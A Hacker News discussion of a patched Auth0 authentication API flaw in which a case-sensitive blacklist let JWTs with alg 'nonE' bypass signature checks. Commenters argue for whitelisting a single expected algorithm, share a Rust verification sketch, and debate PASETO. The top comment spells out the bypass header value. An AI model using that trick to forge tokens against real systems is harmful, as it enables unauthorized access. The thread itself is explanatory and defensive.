top | item 22890604

Auth0 JWT Auth Bypass: Case-Sensitive Blacklisting Is Harmful

195 points| CiPHPerCoder | 6 years ago |insomniasec.com | reply

92 comments

order
[+] CiPHPerCoder|6 years ago|reply
Tired: {"alg":"none"}

Wired: {"alg":"nonE"}

The JOSE standards (including JWT) are a gift that keeps on giving to attackers.

I designed an alternative format in 2018 called PASETO, which doesn't contain the JOSE foot-guns. (I'm pushing for an IETF RFC this year.)

https://paseto.io

EDIT: Also, this affected their Authentication API rather than their JWT library.

If you use their JWT library, well, it certainly allows this kind of horrendous misuse... but it is not, per se, vulnerable.

[+] speedgoose|6 years ago|reply
Before starting a new project some time ago, I read about the critics to JOSE (JWE) and the alternative PASETO. I decided to use JOSE carefully instead of PASETO because it had an IETF RFC. I think it will be great for PASETO to get a RFC as well. The second point that made me chose JOSE was that PASETO was a bit too mean towards JOSE, and I didn't want drama in my technology choices.

But good work! With a RFC PASETO will be my choice for my next projects.

[+] Nursie|6 years ago|reply
We use it, but restrict the sig alg to a couple of known-good values, so am hoping this particular vulnerability is not present in our system.

We had an infosec guy excitedly tell us that PASETO was the future, and we need to change to it right now. It looked good, and a way to avoid some of the possible JiWY issues in the same way having a TLS implementation that only allowed strong ciphers might.

But we have to integrate with so many third party pieces that require JWT it wasn't an option.

[+] different_sort|6 years ago|reply
Why a new standard than to push for reform to the current standard?

Are they just closely protected by greybeards who won't listen to reason?

Question comes from a true place of ignorance/curiosity, I definitely understand the need to have unambiguous, easy to implement security tokens without the foot-guns.

[+] grinich|6 years ago|reply
I think we're going to use PASETO for some stuff at WorkOS. Thanks for building it. :)
[+] kyrra|6 years ago|reply
(googler, opinions are my own)

For server-to-server, I continue to prefer PGP to provide my encryption. While Google Payments[0] supports PGP and JWE for encrypting payloads, PGP is well tested and most of the bugs have been worked out. JWS/JWE continues to have implementation bugs (likely due to being too flexible).

[0] https://developers.google.com/standard-payments/reference/be...

[+] dwaite|6 years ago|reply
> I'm pushing for an IETF RFC this year.

Are you planning an informational document, or going through the IETF standardization process?

Also, the last published draft is two years old this week. Have there been changes since then to the spec? Are implementations generally interoperable?

[+] OatMilkLatte|6 years ago|reply
I'm going to use PASETO for a personal project I'm working on. If the COVID lockdown ever ends and I have time to work on it. Thanks for building it!
[+] bflesch|6 years ago|reply
Paseto is a great project, thank you very much for your contribution!
[+] ucarion|6 years ago|reply
What IETF WG are you working through?
[+] thinkshiv|6 years ago|reply
Hi all - Shiv from Auth0. I am the CPO and wanted to share some additional context here. On July 31st 2019, at 5:11 am, we received an email from Insomnia reporting a service vulnerability. By 11:00 pm the same day, we had fixed the issue in production. We analyzed the logs and validated that no one exploited the vulnerability. More details from our CSO here: https://auth0.com/blog/insomnia-security-disclosure/?utm_sou.... Thanks to Insomnia for reporting the vulnerability and their partnership in coordinated disclosure. We appreciate the continued feedback from the security community-at-large to ensure we are providing the most secure platform for our global customers.
[+] treve|6 years ago|reply
Why did your implementation have a case-sensitive check for a fixed list of algorithms, and why are you blacklisting vs. whitelisting acceptable algorithms? 'Old, stable' codebase or not... this is production code for a security product and seems like something that would be picked up during an audit.
[+] Arnout|6 years ago|reply
I've encountered issues like this in various systems using JWT at this point. The real problem is that developers blacklist the algorithms they don't want. Instead, the verification code should explicitly whitelist which algorithms you support.

More specifically, you can't even rely on using the 'alg' parameter before successful signature verification with any level of authority: after all, it is protected by the signature it declares the algorithm for itself. So even with a whitelist, there is the potential of downgrade attacks.

In other words, don't even use a whitelist, use a single specific expected algorithm.

[+] hinkley|6 years ago|reply
I have a coworker who does shit like this all the time.

The list of supported options is not only knowable, but changes very slowly. Which means it's almost certainly known at commit time. Just enumerate them. By hand. Oh no, you might have to type in some text that exists somewhere else! Quelle horreur!

The list of unsupported options is unknowable. The list of string or path interpolation bugs is knowable, but isn't known by the sort of person who thinks a whitelist is a bad idea. Build a lookup table and stop trying to be clever.

[+] deathanatos|6 years ago|reply

  fn verify_jwt(
    // The input from the network/user; the JWT we will be verifying
    untrusted_jwt: String,
    // *The* way in which we expect JWTs to be issued / we will be verifying against:
    verifier: Verifier,
  ) -> ... {

    // Basic sanity checks & decoding.
    let untrusted_jwt: Jwt = ...;

    if !verifier.acceptable_alg(untrusted_jwt.alg) {
       bail;
    }
    verifier.verify(untrusted_jwt)
  }
Where `verifier` is something like `JwtRsa` or `JwtEd25519`, or `JwtHmac`. The verifier should know what few, limited algorithms to look for, and it should reject anything and everything that's not under its domain area. There's no blacklist, no guesswork. (I don't even think I'd have `acceptable_alg`; just let `verify` do that work; it has to look at that field anyways to set up, e.g., the hasher.)

I'm largely omitting¹ JWE, so perhaps there's some hidden dragon in there, or perhaps we just handle those completely separately. But for JWS, am I missing something? Unless you pass `NoneVerifier`, in which case you're explicitly opting in to alg: none and it's goriness.

Sadly, I don't think any of the top three Rust libraries do this.

¹I'm also omitting that RSA has many attached hash algorithms in JWS; one can imagine that JwtRsa might let you configure what hashers it will/will not use. As it is, some libraries take sort of this form, but split the key material off from the algorithm … letting you pass craziness like an RSA key material and HMAC-SHA256, which makes no sense. That is, what hash algorithms (if any) are possible is a function of the type of key material coming in.

¹I'm also omitting verification of the claims, which I think a library should generally handle.

[+] karatestomp|6 years ago|reply
Is there some good reason to prefer a blacklist in this case, that I'm not thinking of, that might change my reaction to this from "uh, maybe I need to entirely re-think my assumption that Auth0 is any better at this whole securing-users thing than I am"? My immediate and ongoing reaction to the headline was and is, "wait, a blacklist? WTF!"
[+] applecrazy|6 years ago|reply
> Instead, the verification code should explicitly whitelist which algorithms you support.

What libraries are you using? I just looked through the auth code for a project I'm working on (which uses `jsonwebtoken`) and it has an option to whitelist algorithms in the `jwt.verify` method.

Edit: removed repeated info

[+] xianb|6 years ago|reply
It's fascinating how Auth0 actually had a blog post about finding and fixing a handful of JWT vulnerabilities years ago (one of them is more advanced to exploit than this). Just another example of why you always have to be vigilant and that properly implementing encryption/security is hard

https://auth0.com/blog/critical-vulnerabilities-in-json-web-...

[+] twic|6 years ago|reply
At some point, that alg parameter gets resolved to an algorithm - an object or enum constant or something. This bug implies that the filtering was done on the string value of the parameter, and not the resolved value. That seems like a schoolboy error.
[+] user5994461|6 years ago|reply
It's much worse than that. There are like 5 options for the algorithm value, none, RS256, HS256, etc...

The vulnerabilities implies that they don't verify the value against the very limited list of possible values, which is incredibly stupid.

[+] rvz|6 years ago|reply
The gist of this Auth0 authentication API bypass is detailed as follows:

> The Authentication API prevented the use of alg: none with a case sensitive filter. This means that simply capitalising any letter e.g. alg: nonE, allowed tokens to be forged.

I really don't know what to think of why you need a case-sensitive filter for alg:'none'. The question is that why use and support 'alg:none' in the standard in the first place? As I previously commented, the option to have 'alg: none' should never be used as it is still the biggest footgun in the JOSE specification. Even giving the user a choice of ciphers to use is a recipe for disaster. Thus, JWT is still a cryptographically weak standard and its use is discouraged by many cryptographers.

PASETO [0] or Branca [1] are cryptographically stronger alternatives to use over JWT here.

[0] https://paseto.io

[1] https://branca.io

[+] applecrazy|6 years ago|reply
> the option to have 'alg: none' should never be used

I doubt anyone uses this deliberately (edit: except maybe for internal server to server communications?). I agree that having it as an option is a footgun. I still think this is a non-issue on the client/backend, most libraries explicitly make you whitelist token signing algorithms and will throw errors if the token isn't signed with the right algorithm.

> Even giving the user a choice of ciphers to use is a recipe for disaster.

How so? I'm still learning this stuff, so I'm genuinely curious.

[+] wereHamster|6 years ago|reply
> The question is that why use and support 'alg:none' in the standard in the first place?

FTFA:

> The JWT standard supports insecure JWT algorithms for scenarios where encryption and a signature are not suitable, such as trusted server-to-server communication. In these scenarios, the none algorithm is specified in the JWT header. The none alg type should never be used for untrusted user-supplied tokens.

[+] user5994461|6 years ago|reply
Most JWT libraries require to hardcode the expected algorithm when verifying a token, so if your applications are verifying the token provided by Auth0 with a JWT library, they're most likely not vulnerable to this mistake.
[+] userbinator|6 years ago|reply
I think what's more harmful is the fact that something is case-insensitive.

Case insensitive may have some benefits for human-facing stuff, but otherwise the byte-exact comparison you get with case-sensitive semantics is superior.

[+] joepie91_|6 years ago|reply
There's actually three lessons to be drawn from this incident:

1. Don't use JWT, it's too easy to mess up.

2. If you're trying to fence off some sort of format or API, whitelist things, don't blacklist them.

3. This narrative that "you should use a third-party authentication provider because they're security experts and are much less likely to get it wrong"... well... I think you can see where I'm going with this.

[+] gjvnq|6 years ago|reply
What if someone used the correct case but weird Unicode characters? I mean, if "none" = "nonE", is "none" = "none"
[+] user5994461|6 years ago|reply
Good catch. JWT is unicode out-of-the-box, which is really important to support non english user names and such.

If Auth0 is doing any sort of normalization they will definitely be vulnerable to all the normalization bugs from unicode. Would be a great follow up vulnerability.

[+] theamk|6 years ago|reply
The answer to that is we should not be using _any_ case-insensitive strings in protocols.

They are fine for human-visible names, but field names and internal enum values should use byte-by-byte comparison. It just makes entire class of vulnerabilities go away.

[+] NoInputSignal|6 years ago|reply
I think this points out that the semantics of trusting the header (which is still a part of the message) at all is flawed and leads to implementations getting it wrong and leaving gaps for attackers to exploit.
[+] tinus_hn|6 years ago|reply
Blacklisting while you should have been whitelisting is harmful. Choose what you allow instead of trying to list what you don’t.
[+] rgj|6 years ago|reply
Without reading the article: any kind of blacklisting is considered harmful in security.
[+] eximius|6 years ago|reply
Always normalize your input?
[+] JdeBP|6 years ago|reply
Try:

Don't encode your machine-to-machine protocol as human-readable strings, leading to things like declaring machine-readable identifiers to be case-insensitive when only the humans need this, not the machines.